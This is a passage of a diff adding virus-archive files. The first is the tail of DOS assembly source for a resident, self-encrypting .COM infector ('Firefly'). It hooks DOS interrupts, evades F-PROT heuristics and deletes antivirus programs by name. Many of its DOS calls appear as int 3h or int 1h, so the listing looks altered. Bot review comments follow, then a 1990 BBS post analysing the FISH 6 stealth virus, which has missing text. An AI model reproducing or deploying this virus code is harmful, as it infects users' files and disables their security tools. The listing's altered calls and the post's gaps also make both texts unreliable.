+ je clear + inc [click] ; increase click count + jmp endme +clear: mov [click], 00h ; clear click count + mov ax, 40h + mov ds, ax + mov bx, 17h ; ds:bx = location o' flags + and byte ptr [bx],0 ; clear keyboard flag(s) + jmp endme +one: inc [click] + mov ax, 40h + mov ds, ax + mov bx, 17h + mov byte ptr [bx],20h ; set numlock flag + jmp endme +two: inc [click] + mov ax, 40h + mov ds, ax + mov bx, 17h + mov byte ptr [bx],40h ; set caps lock flag + jmp endme +three: inc [click] + mov ax, 40h + mov ds, ax + mov bx, 17h + mov byte ptr [bx],10h ; set scroll lock flag +endme: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp dword ptr cs:[old_1Ch] ; Go to old int 1Ch + db 'Psalm 69' +screw_fprot: + jmp $ + 2 ; Nested calls to confuse + call screw2 ; f-protect's heuristic + call screw2 ; analysis + call screw2 ; + call screw2 ; + call screw2 ; + ret ; +screw2: ; + jmp $ + 2 ; + call screw3 ; + call screw3 ; + call screw3 ; + call screw3 ; + call screw3 ; + ret ; +screw3: ; + jmp $ + 2 ; + call screw4 ; + call screw4 ; + call screw4 ; + call screw4 ; + call screw4 ; + ret ; +screw4: ; + jmp $ + 2 ; + ret ; + db 'Every day is Halloween' +Firefly: + pushf ; Am I checking if + cmp ax,2c2ch ; I am resident? + jne My_21h ; + mov ax,0FFFh ; If so, return + popf ; 0FFFh in AX + iret ; + +My_21h: + push ax ; save these + push bx ; + push cx ; + push dx ; + push si ; + push di ; + push ds ; + push es ; +check_for_proper_calls: + cmp ah, 4Bh ; executed? + je chk_com + cmp ah, 3Dh ; open? + je chk_com + cmp ah, 43h ; attribs? + je chk_com + cmp ah, 6Ch ; extended open? + je extended + +notforme: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf + jmp dword ptr cs:[old_21h] ; The End + db 'Happiness in Slavery' +extended: + mov dx, si ; now a normal open +chk_com: + mov word ptr cs:victim_name,dx + mov word ptr cs:victim_name+2,ds + cld + mov di,dx + push ds + pop es + mov al,'.' 
; find the period + repne scasb ; + call avtest + cmp ax, 00ffh ; WAS the program an AV? + je notforme + cmp word ptr es:[di],'OC' ; is i a .(CO)M? + jne notforme +Grab_24: ; hook interrupt 24 + push ds ; by direct writes to + push dx ; interrupt vector + xor ax, ax ; table + mov ds, ax ; + mov dx, offset new_24h ; + mov word ptr ds:[24h*4], dx ; + mov word ptr ds:[24h*4+2], es ; + pop dx + pop ds + +open_victim: + push cs + pop es + lds dx, cs:victim_name ; get and save attributes + mov ax, 4300h ; + int 3h ; + jc notforme ; error handler + push cx ; + push ds ; + push dx + mov ax, 4301h ; clear attribs + xor cx, cx ; + int 1h ; + jc notforme + mov ax,3D02h ; open victim + lds dx, cs:victim_name ; + int 3h ; + jc notforme ; error handler + push cs ; + pop ds ; + xchg ax, bx ; put handle in proper place +get_date: ; get and save date + ; and time + mov ax,5700h + int 3h + push cx ; save time + push dx ; save date + +check_forme: + mov ah,3fh ; read 1st 3 bytes + mov cx,03h ; + mov dx,offset vict_head ; + int 1h + + mov ax, 4202h ; point to end + xor cx, cx ; + xor dx, dx ; + int 3h ; + + mov cx, word ptr [vict_head+1] ; possible jump location + add cx, last-start+3 ; + cmp ax, cx ; already infected? 
+ jz save_date ; + push ax +get_random: + mov ah, 2Ch ; dx and (cx-dx) + int 3h ; will be to two + or dx, dx ; encryption values + jz get_random ; +write_virus: + mov word ptr [offset encryption_value_1], dx + mov word ptr [offset e_value_1], dx + sub cx, dx + mov word ptr [offset encryption_value_2], cx + mov word ptr [offset e_value_2], cx + pop ax + mov si, ax ; fix BX offset in head + add si, ((offset begin-offset start)+100h) + mov word ptr [offset start+1], si + + mov si, offset start ; copy virus to buffer + mov di, offset encryptbuffer ; + mov cx, last-start ; + rep movsb ; + + sub ax, 03h ; construct jump + mov word ptr [offset new_jump+1], ax ; + mov dl, 0E9h ; + mov byte ptr [offset new_jump], dl ; +Encryptvirus_in_buffer: + push bx ; encrypt copy + mov bx, offset ((begin-start)+encryptbuffer) ; in encrypt- + mov cx, encryptlength ; buffer +e_loop: ; + db 81h ; XOR [bx] + db 37h ; +e_value_1: ; + dw 0000h ; scrambler #1 + db 81h ; XOR [bx+2] + db 77h ; + db 02h ; +e_value_2: ; + dw 0000h ; scrambler #2 + add bx, 4 ; + loop e_loop ; loop + + pop bx + mov ah, 40h ; write virus + mov cx, last-start ; + mov dx, offset encryptbuffer ; + int 1h ; + + mov ax, 4200h ; point to front + xor cx, cx ; + xor dx, dx ; + int 1h ; + + mov ah, 40h ; write jump + mov dx, offset new_jump ; + mov cx, 03h ; + int 3h ; +save_date: + pop dx ; Date + pop cx ; Time + mov ax,5701h ; + int 1h + ; +close_file: ; + mov ah,03Eh ; Close file and restore + int 3h ; attribs + mov ax, 4301h ; + pop dx ; + pop ds ; This is the end... + pop cx ; My only friend, The End. + int 3h ; - Jim Morrison + jmp notforme ; +new_24h: + mov al,3 ; Critical Error (Mis)handler + iret ; + db 'The land of Rape and Honey' + + ; This area is the "intelligence" of Firefly + ; It looks for known AV names which it then deletes. 
+ ; So it sort of shuts down the computers "immune system" +avtest: + cmp word ptr es:[di-3],'MI' ;Integrity Master + je AV ;*IM + + cmp word ptr es:[di-3],'XR' ;*rx + je AV ; + + cmp word ptr es:[di-3],'PO' ;*STOP + jne next1 ;(VIRSTOP) + cmp word ptr es:[di-5],'TS' ; + je AV ; + +next1: cmp word ptr es:[di-3],'VA' ;*AV i.e. cpav + je AV_Detected ;(TBAV) (MSAV) + + cmp word ptr es:[di-3],'TO' ;*prot f-prot + jne next2 ; + cmp word ptr es:[di-5],'RP' ; + jne next2 ; +AV: jmp AV_Detected ; must be equal + +next2: cmp word ptr es:[di-3],'NA' ;*scan McAffee's + jne next3 ;(TBSCAN) + cmp word ptr es:[di-5],'CS' ; + je AV_Detected ; + + cmp word ptr es:[di-3],'NA' ;*lean CLEAN.. + jne next3 ; why not eh? + cmp word ptr es:[di-5],'EL' ;(TBCLEAN) + je AV_Detected ; + +next3: cmp word ptr es:[di-3],'CV' ; Victor Charlie + je AV_Detected ; default *VC + + cmp word ptr es:[di-3],'KC' ; VCHECK + jne next4 ; (Victor Charlie) + cmp word ptr es:[di-5],'EH' ; (TBCHECK) *HECK + je AV_Detected ; +next4: + cmp word ptr es:[di-3],'ME' ; TBMEM + jne next5 ; *BMEM + cmp word ptr es:[di-5],'MB' ; + je AV_Detected ; +next5: + cmp word ptr es:[di-3],'XN' ; TBSCANX + jne next6 ; *CANX + cmp word ptr es:[di-5],'AC' ; + je AV_Detected ; +next6: + cmp word ptr es:[di-3],'EL' ; TBFILE + jne next7 ; *FILE + cmp word ptr es:[di-5],'IF' ; + je AV_Detected ; +next7: + ret +AV_Detected: + mov ds, word ptr cs:[victim_name + 2] ; The Victim + mov dx, word ptr cs:[victim_name] + mov ax, 4301h ; Clear it's attribs + mov cx, 00h ; + int 1h + mov ah, 41h ; Delete It. + int 3h ; + ret ; + db 'Its Dead Jim' + +vict_head db 090h, 0cdh, 020h ; 3 bytes of storage +old_21h dw 00h,00h ; int 21 storage +old_1Ch dw 00h,00h +click db 00h +last: + +; The heap........ junk not needed in main program + +victim_name dd ? +new_jump db 090h, 090h, 090h +encryptbuffer db (last-start)+1 dup (?) +code ends + end start + + + 
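Review bot: the header comment says the VSAFE de-install code comes "from previous issues of the newsletter" without naming the newsletter, and the only provenance visible in the listing is the greeting string "Greetings to Urnst Kouch and the CRYPT staff"; the commit message or archive index should record the publication and issue this listing was taken from instead of leaving the reader to infer it from the greeting. Two further documentation points for the index entry: the comment at cut_hole ("This also screws with TBCLEAN ???????") marks the author's own TBCLEAN claim as unverified, so it should not be catalogued as established behaviour, and the header's statement that the lock-LED cycling is tied to the timer tick interrupt (1Ch) is what the Hookroutines/Lights code implements, which is the observable artefact an archivist describing this sample would cite.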
diff --git a/textfiles.com/virus/fish.vir b/textfiles.com/virus/fish.vir new file mode 100644 index 00000000..f5d979a0 --- /dev/null +++ b/textfiles.com/virus/fish.vir 
@@ -0,0 +1,171 @@ + This was originally posted in the International Virus Echo, but +some parties here may find of interest. + +Date: 06-30-90 (03:11) Number: 1344 The DATAMAX BBS + To: ALL Refer#: NONE +From: MARK TAYLOR Read: YES +Subj: REPOSTED MESSAGE Conf: (39) fVIRUS +------------------------------------------------------------------------ +(This message was originally addressed to "Merry Hughes", an alias +used by the sysop of the Excalibur BBS. The author, Frank Breault, +tried to post it there on June 28. Since he is not a caller of this +BBS, he asked me to repost it for him here because it contains +important information which everyone should be made aware of. Frank +is offering to substantiate his statements in writing in a docu- +mented, scientific way, and to provide samples, copies of work logs, +decrypted virus images and transcripts of debugger sessions to +anyone who is *NOT CONNECTED* in any way with the so-called +"researchers" of the McAfee company. A sworn, notarized affidavit +to that effect will be required prior to release of code data or +samples. Leave me a message if you are interested and I'll try to +make arrangements. I make no claim of any knowledge of these +matters but think that people should be allowed to express the +results of their work, especially when they are trying to warn the +public about a serious possible danger in a selfless, noncommercial +manner). ------Message starts: + +"Well, Merry, most of those who have looked at this unusual virus +still don't know everything about it. Even after being fully +decrypted, the code remains hard to disassemble. But I am certain +that it doesn't contain any reboot routine and I am *quite certain* +that it does not occupy variable memory size. I have some idea of +how you came to believe that it uses variable memory allocation but, +not knowing exactly what you saw, I can't explain your belief. I +think perhaps you were misled by a trick it plays as it loads into +RAM. 
Anyway, Dave Chess of IBM stated that he has disassembled +about half of it. Rick Engle of Wang Labs seems to have decrypted it +almost completely. The difficulty in disassembling stems from its +intentionally-misleading code. + +Regarding the reboot, perhaps the protection program you were using +caused it, not the virus itself (Incidentally, both version 1.07 and +v1.10 of the F-DLOCK program you mentioned are quite useless +against the FISH 6: it goes right by them). + +Every day, I am finding new and intriguing aspects of the FISH 6. +You have no doubt noticed that the virus changes its appearance on +disk each day of the year. All copies are encrypted, but copies +produced the same day are all encrypted similarly. This indicates +that the date holds the encryption key and indeed, that turns out to +be so: the virus looks at the date and adds the number of the month ++ the day of the month to derive `n', the number it uses as key for +its disk XORing routine. The encryption routine used on disk and the +one used in memory are not the same, however. + +I now have a fully-decrypted copy of the FISH 6. The string you +mentioned is shown: + + +(Quotation marks are mine). The entire string is displayed onscreen +if any infected file is executed twice when the system date is 1991. +any sense out of them yet (with my luck, it's probably my birthdate +- or yours!). + +Once fully decrypted, the virus code is seen to contain the +following strings, scattered all over its body: + + FISH, SHAD, TROUT, FIN, MUSKY, SOLE, PIKE, MACKEREL, + TUNA, CARP, COD, BASS, SHARK. + +While in RAM, however, they appear only partially decrypted at any +one instant, but this appearance also changes constantly. Although +obviously fish names, they are probably not true text strings as +such, but portions of executable code. 
Did someone take the time to +compose this: + T = 54h = PUSH SP + U = 55h = PUSH BP + N = 4Eh = DEC SI + A = 41h = INC CX +and then incorporate it into self-encrypting code in some meaningful +manner..? Are they just decoration..? Encryption keys..? + +The RAM image, responsible for the viral activity once the virus is +loaded into memory, is itself also encrypted, but not in the same +manner as on disk. Its appearance seems to change from one moment +to the next. The virus does this every time Int 21 is called. Such +mutations in RAM do not involve the entire 3584 bytes, but only many +short portions of the code, each 4-5 bytes long, at any given time. +After enough such changes have taken place, the entire body of the +virus in RAM would have been completely altered (except the de- +cryption routine itself). The size of the memory image, however, +remains definitely constant and *does not change*, as you stated. +You can be assured of that. + +The string "FISH FI..." is found, as you yourself stated, Merry, at +the end of infected disk files. This, however, is not "later removed +from the file by the virus itself", as you said. The "FISH FI..." +string is permanent. However, if you try to use it as a signature +for the virus, it isn't always useful. Perhaps this action of the +virus is what gave you the impression that the string gets removed; +it doesn't, but neither can you read it if the virus is in RAM. The +string, together with the rest of the virus code, appears to vanish. + +Like the 4096, the virus disinfects files "on the fly" as these are +loaded into RAM, so they show the original size, date and CRC. The +FISH 6 seems to use an improved technique to do this, however, and +this probably allows it to "disinfect" even files that are being +opened for Read (as when being scanned for search strings). 
+ +The method used by the FISH 6 to determine which file to "clean up" +(as it's being opened or loaded into RAM) is different from the one +it uses to determine whether a file is already infected (for +purposes of avoiding multiple reinfection). Like the 4096, the FISH +marks infected files by altering a special byte in the file date +entry. (The presence of this "autodisinfection marker" is of limited +diagnostic value; several viruses use it). In the case of the FISH +6, files bearing this mark are automatically "disinfected" on the +fly when opened. The virus does not use this modified date entry to +determine which files to infect, in the way Zero Bug, Vienna and +other viruses do. If this byte is altered, the virus stops "auto- +disinfecting" them, but the files remain infected and infectious; +FISH 6 knows this and does not reinfect them a second time. It uses +another method to determine which files it has already infected. I +believe this may be related to certain operations performed at the +very beginning of the virus code. + + NOTE: If an infected file is manually re-dated, it will no longer + be disinfected "on the fly" by the FISH 6. Thus, files whose + "autodisinfection byte" has been deleted *can be* identified, + if infected, using string scanners, even if FISH 6 is active + in RAM. This offers a means, albeit inelegant, to prepare a + suspected file for scanning without the virus being able to + hide itself. If a file is so prepared (redated), then SCANV + and F-PROT and other string searchers will again be able to + detect it - but they may still spread the infection in any + case, if FISH 6 is in RAM. + + WARNING: + ------- +This virus would seem to encrypt itself in more than one way or, at +least, change in some unusual manner. I have in my possession +copies of what seems to be the FISH 6 virus, but which do not bear +the scanning string used by SCANV 64 and F-PROT 1.10 and are +*NOT +DETECTED BY EITHER SCANNER* on disk. 
Yet, they are active +and give +rise to infections which appear similar to the FISH 6. In this +sense, I have also received confirmed reports about the existence of +a "Mother Fish", larger in size and having the capability of +changing the character of the FISH 6 into a different virus. I don't +yet have this "Mother Fish" but wonder if perhaps these strange FISH +copies might have been produced by it, and if the virus which we all +call the "FISH 6" is really not a virus, in the usual sense, but +rather just the end product of a more complex, much more +sophisticated and dangerous viral *system*. If this is so (and it +appears that it may be so), then analyzing the FISH 6 as a simple +entity might be a serious mistake. +---------Message ends. + +Personally, I think it's very regrettable that the people in the +McAfee company are endangering the public by witholding information +just because it does not agree with the results they previously +published in error. How long does everybody have to live under false +assumptions just to allow "Merry Hughes" to save face? When Frank +Breault made a mistake earlier, he admitted it and corrected it +immediately (12 hours later). Why is it that the person who calls +herself (falsely) "Merry Hughes" (and who has made many, many +errors describing viruses!) cannot have the decency to admit +*his/her* mistakes? Why does he/she hide behind an alias??? +Really, there is no REQUIREMENT that he/she be infallible, +just plainly honest would do... + \ No newline at end of file
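Review bot: the archived copy of fish.vir has visible gaps that the commit should acknowledge: after "The string you mentioned is shown:" the quoted string itself is missing (the next text is "(Quotation marks are mine)"), and the fragment "any sense out of them yet (with my luck, it's probably my birthdate - or yours!)" has lost the start of its sentence. If a more complete copy of the DATAMAX BBS repost is available it should be used; otherwise the commit message should state that the text is archived as found with these omissions, so a reader does not take the missing string for an editorial redaction. Minor: the file is added without a trailing newline ("No newline at end of file"), unlike the other files in this patch.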